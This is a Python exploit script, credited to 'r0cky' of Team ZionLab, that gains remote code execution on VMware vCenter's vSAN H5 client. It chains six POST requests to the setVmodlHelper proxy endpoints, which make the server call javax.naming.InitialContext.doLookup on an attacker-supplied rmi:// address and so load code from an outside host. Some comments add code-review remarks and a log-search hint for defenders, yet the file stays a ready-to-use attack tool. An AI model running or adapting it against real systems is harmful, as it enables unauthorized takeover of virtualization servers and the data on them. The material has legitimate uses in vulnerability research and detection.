#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: r0cky
@Time: 2021/6/3-16:57
"""
import sys
from urllib.parse import urlparse
import json
import requests
import urllib3
# Silence urllib3's "unverified HTTPS request" warning. Every request in this
# file is sent with verify=False, so TLS certificate errors are neither
# enforced nor reported anywhere.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def banner():
    """Print the tool's ASCII-art banner to stdout.

    The literal is a plain (non-raw) triple-quoted string, so the backslashes
    in the art are interpreted as escape sequences where they form a valid one.
    """
    print("""
==============================================================
_____ _ _____ _____ ______
/ ____| | | | __ \ / ____| ____|
__ _| | ___ _ __ | |_ ___ _ __ | |__) | | | |__
\ \ / / | / _ \ '_ \| __/ _ \ '__| | _ /| | | __|
\ V /| |___| __/ | | | || __/ | | | \ \| |____| |____
\_/ \_____\___|_| |_|\__\___|_| |_| \_\\_____|______|
Powered by r0cky Team ZionLab
==============================================================
""")
def payload1(url):
    """Step 1 of the request chain: POST ``{"methodInput": [None]}`` to setTargetObject.

    Args:
        url: ``scheme://host[:port]`` prefix, as built in ``__main__``.

    Reads the module-level ``headers``. If the JSON response body contains a
    ``"result"`` key, continues with ``payload2(url)``; otherwise prints a
    failure line and the chain stops. ``r.json()`` raises if the body is not
    JSON, and nothing in this function catches that.
    """
    print ("[*] Step 1 setTargetObject to null ...")
    # All six steps share this endpoint prefix; only the trailing method name
    # differs. For defenders, the prefix is the string to search for in
    # web-server access logs when looking for this chain.
    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetObject"
    data = {"methodInput":[None]}
    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False)
    if "result" in r.json():
        payload2(url)
    else:
        print ("[-] send payload failed.")
def payload2(url):
    """Step 2 of the request chain: POST a fixed method name string to setStaticMethod.

    Args:
        url: ``scheme://host[:port]`` prefix, as built in ``__main__``.

    Same success test as ``payload1``: a ``"result"`` key in the JSON body
    continues with ``payload3(url)``, anything else prints a failure line.
    A non-JSON response makes ``r.json()`` raise, uncaught here.
    """
    print("[*] Step 2 setStaticMethod to payload ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setStaticMethod"
    data = {"methodInput": ["javax.naming.InitialContext.doLookup"]}
    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False)
    if "result" in r.json():
        payload3(url)
    else:
        print ("[-] send payload failed.")
def payload3(url):
    """Step 3 of the request chain: POST ``["doLookup"]`` to setTargetMethod.

    Args:
        url: ``scheme://host[:port]`` prefix, as built in ``__main__``.

    Continues with ``payload4(url)`` when the JSON body has a ``"result"``
    key; otherwise prints a failure line. ``r.json()`` raises on non-JSON
    bodies, uncaught here.
    """
    print("[*] Step 3 setTargetMethod to doLookup ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetMethod"
    data = {"methodInput": ["doLookup"]}
    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False)
    if "result" in r.json():
        payload4(url)
    else:
        print ("[-] send payload failed.")
def payload4(url):
    """Step 4 of the request chain: POST the caller-supplied argument to setArguments.

    Args:
        url: ``scheme://host[:port]`` prefix, as built in ``__main__``.

    Reads the module-level ``rmi_class`` (assigned from ``sys.argv[2]`` in
    ``__main__``, not passed as a parameter) and sends it nested as
    ``[[rmi_class]]``. It is forwarded verbatim with no validation. Continues
    with ``payload5(url)`` on a ``"result"`` key in the JSON body.
    """
    print("[*] Step 4 setArguments with payload args ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setArguments"
    # NOTE: rmi_class is a module global that only exists when run as a script.
    data = {"methodInput": [[rmi_class]]}
    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False)
    if "result" in r.json():
        payload5(url)
    else:
        print ("[-] send payload failed.")
def payload5(url):
    """Step 5 of the request chain: POST ``{"methodInput": [None]}`` to prepare.

    Args:
        url: ``scheme://host[:port]`` prefix, as built in ``__main__``.

    Continues with ``payload6(url)`` when the JSON body has a ``"result"``
    key; otherwise prints a failure line. ``r.json()`` raises on non-JSON
    bodies, uncaught here.
    """
    print("[*] Step 5 initial payload class and methods ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/prepare"
    data = {"methodInput": [None]}
    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False)
    if "result" in r.json():
        payload6(url)
    else:
        print ("[-] send payload failed.")
def payload6(url):
    """Step 6 of the request chain: POST ``{"methodInput": [None]}`` to invoke.

    Args:
        url: ``scheme://host[:port]`` prefix, as built in ``__main__``.

    Unlike steps 1-5, the response ``r`` is never inspected: the success
    lines are printed unconditionally, so the final message does not mean
    the request actually succeeded.
    """
    print("[*] Step 6 trigger method invoke ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/invoke"
    data = {"methodInput": [None]}
    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False)
    # `r` is unused from here on; status code and body are not checked.
    print("[+] send payload success.")
    print()
    print("[END] VMWare vCenter RCE Done.")
# Shared request headers; read as a module global by payload1..payload6.
# Defined after those functions, which is fine because it is only looked up
# at call time.
headers = {"Content-Type": "application/json"}
if __name__ == '__main__':
    banner()
    try:
        # argv[1]: target URL. argv[2]: value that payload4 reads through the
        # module-level name `rmi_class` (assigned here, not passed down).
        target = sys.argv[1]
        rmi_class = sys.argv[2]
        # Keep only scheme and host[:port]; any path or query in argv[1] is dropped.
        up = urlparse(target)
        target = up.scheme + "://" + up.netloc
        payload1(target)
    except:
        # Bare except: a missing argument, a connection error and a non-JSON
        # response all land here and are reported as a usage error, which hides
        # the real cause (it also swallows KeyboardInterrupt).
        print("Example: \n\tpython3 " + sys.argv[
        0] + " <target> <rmi://ip/class>\n")